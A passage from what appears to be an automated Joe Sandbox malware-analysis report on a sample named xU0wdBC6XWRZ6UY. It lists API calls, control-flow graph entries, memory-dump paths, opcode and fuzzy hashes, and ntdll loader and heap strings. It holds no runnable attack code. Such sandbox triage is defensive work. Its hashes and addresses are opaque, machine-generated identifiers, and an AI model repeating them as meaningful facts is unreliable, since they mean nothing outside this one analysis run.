                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: f1d72b6fd9c5dbb7acd897e30db6e8d22c5b8e07925bf11e236953ca1c444ec2
                                                          • Instruction ID: cd90b47104bd9a6ee710ac924b004e65f80e09b3f01bf4e72bdab6c263ad1cec
                                                          • Opcode Fuzzy Hash: f1d72b6fd9c5dbb7acd897e30db6e8d22c5b8e07925bf11e236953ca1c444ec2
                                                          • Instruction Fuzzy Hash: E201B971A803187AE720A6958C03FFF7B6CAB44B54F05412EFF04BB1C1D6B8690547E9

                                                          Control-flow Graph
                                                          control_flow_graph 240 408310-40831f 241 408328-40835a call 41c9f0 call 40ace0 call 414e40 240->241 242 408323 call 41be50 240->242 249 40835c-40836e PostThreadMessageW 241->249 250 40838e-408392 241->250 242->241 251 408370-40838a call 40a470 249->251 252 40838d 249->252 251->252 252->250
                                                          APIs
                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                                          • Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
                                                          • Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                                          • Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA

                                                          Control-flow Graph
                                                          control_flow_graph 276 41a7b1-41a7d9 277 41a7df-41a7f4 LookupPrivilegeValueW 276->277 278 41a7da call 41af50 276->278 278->277
                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: c2805c0445263fc07bc243aab8ab46a4a256e4c5e5974922365246541f942c2e
                                                          • Instruction ID: 45f9f379559e80912eda46d75105db880b5e87fdc8b3523c54064ba733369719
                                                          • Opcode Fuzzy Hash: c2805c0445263fc07bc243aab8ab46a4a256e4c5e5974922365246541f942c2e
                                                          • Instruction Fuzzy Hash: A8E0EDB6200204AFDB20DF99CC80ED7779C9F89250F108259FA0C9B202D934E82087F4

                                                          Control-flow Graph
                                                          control_flow_graph 279 41a660-41a691 call 41af50 RtlFreeHeap
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0

                                                          control_flow_graph 282 41a7c0-41a7f4 call 41af50 LookupPrivilegeValueW
                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          APIs
                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          APIs
                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          APIs
                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2160512332
                                                          Strings
                                                          • Critical section address, xrefs: 01095425, 010954BC, 01095534
                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0109540A, 01095496, 01095519
                                                          • Thread identifier, xrefs: 0109553A
                                                          • 8, xrefs: 010952E3
                                                          • Address of the debug info found in the active list., xrefs: 010954AE, 010954FA
                                                          • corrupted critical section, xrefs: 010954C2
                                                          • Critical section address., xrefs: 01095502
                                                          • undeleted critical section in freed memory, xrefs: 0109542B
                                                          • Critical section debug info address, xrefs: 0109541F, 0109552E
                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 01095543
                                                          • double initialized or corrupted critical section, xrefs: 01095508
                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010954CE
                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010954E2
                                                          • Invalid debug info address of this critical section, xrefs: 010954B6
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                          • API String ID: 0-2368682639
                                                          Strings
                                                          • @, xrefs: 0109259B
                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 0109261F
                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010922E4
                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010924C0
                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01092506
                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01092498
                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01092409
                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010925EB
                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01092412
                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01092602
                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01092624
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                          • API String ID: 0-4009184096
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                          • API String ID: 0-2515994595
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                          • API String ID: 0-1700792311
                                                          Strings
                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 010A8A67
                                                          • HandleTraces, xrefs: 010A8C8F
                                                          • VerifierDebug, xrefs: 010A8CA5
                                                          • VerifierDlls, xrefs: 010A8CBD
                                                          • AVRF: -*- final list of providers -*- , xrefs: 010A8B8F
                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 010A8A3D
                                                          • VerifierFlags, xrefs: 010A8C50
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                          • API String ID: 0-3223716464
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                          • API String ID: 0-1109411897
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-792281065
                                                          Strings
                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01079A2A
                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010799ED
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01079A11, 01079A3A
                                                          • LdrpInitShimEngine, xrefs: 010799F4, 01079A07, 01079A30
                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01079A01
                                                          • apphelp.dll, xrefs: 01016496
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-204845295
                                                          Strings
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01092178
                                                          • RtlGetAssemblyStorageRoot, xrefs: 01092160, 0109219A, 010921BA
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010921BF
                                                          • SXS: %s() passed the empty activation context, xrefs: 01092165
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01092180
                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0109219F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                          • API String ID: 0-861424205
                                                          • Opcode ID: cb7068e8e927111323006f3a58dd086ef76939e551b5adafedd0fad833985f9d
                                                          • Instruction ID: 80da25456239a5b40581b9af7dacdd030bc5e37c3df0024d67f4f00e31d44930
                                                          • Opcode Fuzzy Hash: cb7068e8e927111323006f3a58dd086ef76939e551b5adafedd0fad833985f9d
                                                          • Instruction Fuzzy Hash: 5431E97AB40215B7FB21CA998C91FAF7AB8EF65A50F050059BBC46B140D370AA00D7A1
                                                          Strings
                                                          • Loading import redirection DLL: '%wZ', xrefs: 01098170
                                                          • LdrpInitializeProcess, xrefs: 0105C6C4
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0105C6C3
                                                          • LdrpInitializeImportRedirection, xrefs: 01098177, 010981EB
                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 010981E5
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01098181, 010981F5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-475462383
                                                          • Opcode ID: 9182038a1888ffb0766a771ead0786fecf3d07708b1f1bc38f5dd523d069d152
                                                          • Instruction ID: d2a3e832001b1fb5c623377a780bded601bdc28c243668ba81ccf91dce0ee9d8
                                                          • Opcode Fuzzy Hash: 9182038a1888ffb0766a771ead0786fecf3d07708b1f1bc38f5dd523d069d152
                                                          • Instruction Fuzzy Hash: 623104B17483069FE325EF28D985E5BB7D8BF95B10F040568F9C1AB291E660ED04C7A2
                                                          APIs
                                                            • Part of subcall function 01062DF0: LdrInitializeThunk.NTDLL ref: 01062DFA
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01060BA3
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01060BB6
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01060D60
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01060D74
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                          • String ID:
                                                          • API String ID: 1404860816-0
                                                          • Opcode ID: d48052e85a0511cada68d78912db345c5e574eed6e472e883360e5e0b25c9634
                                                          • Instruction ID: 5dc602067a89ee12ac20e1f264fce05e765758122a6d264e99d697351aef2432
                                                          • Opcode Fuzzy Hash: d48052e85a0511cada68d78912db345c5e574eed6e472e883360e5e0b25c9634
                                                          • Instruction Fuzzy Hash: 45425C71900715DFDB61CF28C890BAAB7F9FF44314F1485AAE989DB245E770AA84CF60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                          • API String ID: 0-379654539
                                                          • Opcode ID: acd8180e9f0096dd2b1f270552f9ecb8458186849ad490e62968444db8656f55
                                                          • Instruction ID: f1773ca90daaebbcfd4b5f1ac4585613f2969c4da4c9a93e28062b7af949e1f3
                                                          • Opcode Fuzzy Hash: acd8180e9f0096dd2b1f270552f9ecb8458186849ad490e62968444db8656f55
                                                          • Instruction Fuzzy Hash: 79C1BD702083A6CFD721DF58C144B6AB7E4FF88704F0449AAF9D58BA51EB34DA49CB52
                                                          Strings
                                                          • @, xrefs: 01058591
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01058421
                                                          • LdrpInitializeProcess, xrefs: 01058422
                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0105855E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1918872054
                                                          • Opcode ID: 06c23dfbd2e81c64be1e2cce19477239c79694c0e3ec1734ad73442366cda19f
                                                          • Instruction ID: 19af855539d778a8a874c4413f6137903bb4cf533c6252887f4b19697b3f23e1
                                                          • Opcode Fuzzy Hash: 06c23dfbd2e81c64be1e2cce19477239c79694c0e3ec1734ad73442366cda19f
                                                          • Instruction Fuzzy Hash: B9917871508345AFDB62DE66CC40EABBAECFF88784F40492EFEC492151E735D9448B62
                                                          Strings
                                                          • .Local, xrefs: 010528D8
                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010921D9, 010922B1
                                                          • SXS: %s() passed the empty activation context, xrefs: 010921DE
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010922B6
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                          • API String ID: 0-1239276146
                                                          • Opcode ID: 2c471c9867479f96ea178f874fe22f5797c93caec545ce304e8485432df2bc10
                                                          • Instruction ID: f9b2520b91b699b28e6d9394d68b042b424d7558e759957ecb1fe79bf727c358
                                                          • Opcode Fuzzy Hash: 2c471c9867479f96ea178f874fe22f5797c93caec545ce304e8485432df2bc10
                                                          • Instruction Fuzzy Hash: E6A1A03590022AEBDF65CF58D884BAAB7B4BF58314F1541E9DD88AB351D7309E80CF90
                                                          Strings
                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01081028
                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01080FE5
                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0108106B
                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010810AE
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                          • API String ID: 0-1468400865
                                                          • Opcode ID: a4880c418014f42315f8bde5de41423dfb97cd0a6252a17a8d1c98809f40b13c
                                                          • Instruction ID: 28cfc9e5c18e4d708e589fcec3ff5857b3fb2ea0bc9253d61d878f8475a5e5eb
                                                          • Opcode Fuzzy Hash: a4880c418014f42315f8bde5de41423dfb97cd0a6252a17a8d1c98809f40b13c
                                                          • Instruction Fuzzy Hash: 6E71F1B19083259FDB61EF14C884B9B7BE8AF95764F4044A8FDC88B14AD335D188CBD1
                                                          Strings
                                                          • LdrpDynamicShimModule, xrefs: 0108A998
                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0108A992
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0108A9A2
                                                          • apphelp.dll, xrefs: 01042462
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-176724104
                                                          • Opcode ID: af336f111e9210b48bfa2a7f15195fe51632ac01e9019441f557326fee1dc405
                                                          • Instruction ID: 6194593f0079141d49e92e6539a5ad7363f2d1bc370fa40c18f3ddaeef497f1b
                                                          • Opcode Fuzzy Hash: af336f111e9210b48bfa2a7f15195fe51632ac01e9019441f557326fee1dc405
                                                          • Instruction Fuzzy Hash: D7314875714201EBDB39AF59D980AAAFBF4FB84710F1600BAF9E067648C7B05881C740
                                                          Strings
                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0103327D
                                                          • HEAP[%wZ]: , xrefs: 01033255
                                                          • HEAP: , xrefs: 01033264
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                          • API String ID: 0-617086771
                                                          • Opcode ID: 5272e056d617abe72a7078502fefff9a2bd5fea24484e950caca216cd0acabd5
                                                          • Instruction ID: 51b7c465c2383d66cf5efe61b7530ef635183add7ab409be0e79154d852f701b
                                                          • Opcode Fuzzy Hash: 5272e056d617abe72a7078502fefff9a2bd5fea24484e950caca216cd0acabd5
                                                          • Instruction Fuzzy Hash: 4C92CE70A04249DFDB65CF68C4847AEBBF5FF88300F1884A9E995AB391D735A941CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-4253913091
                                                          • Opcode ID: 2ac87e4a21756ef9783842eecb550936372ee867e08241027b64c16e295a2a9c
                                                          • Instruction ID: e725e8ca8bbc537395227b0832a837e63d63622e780883f9a915101c737db3f6
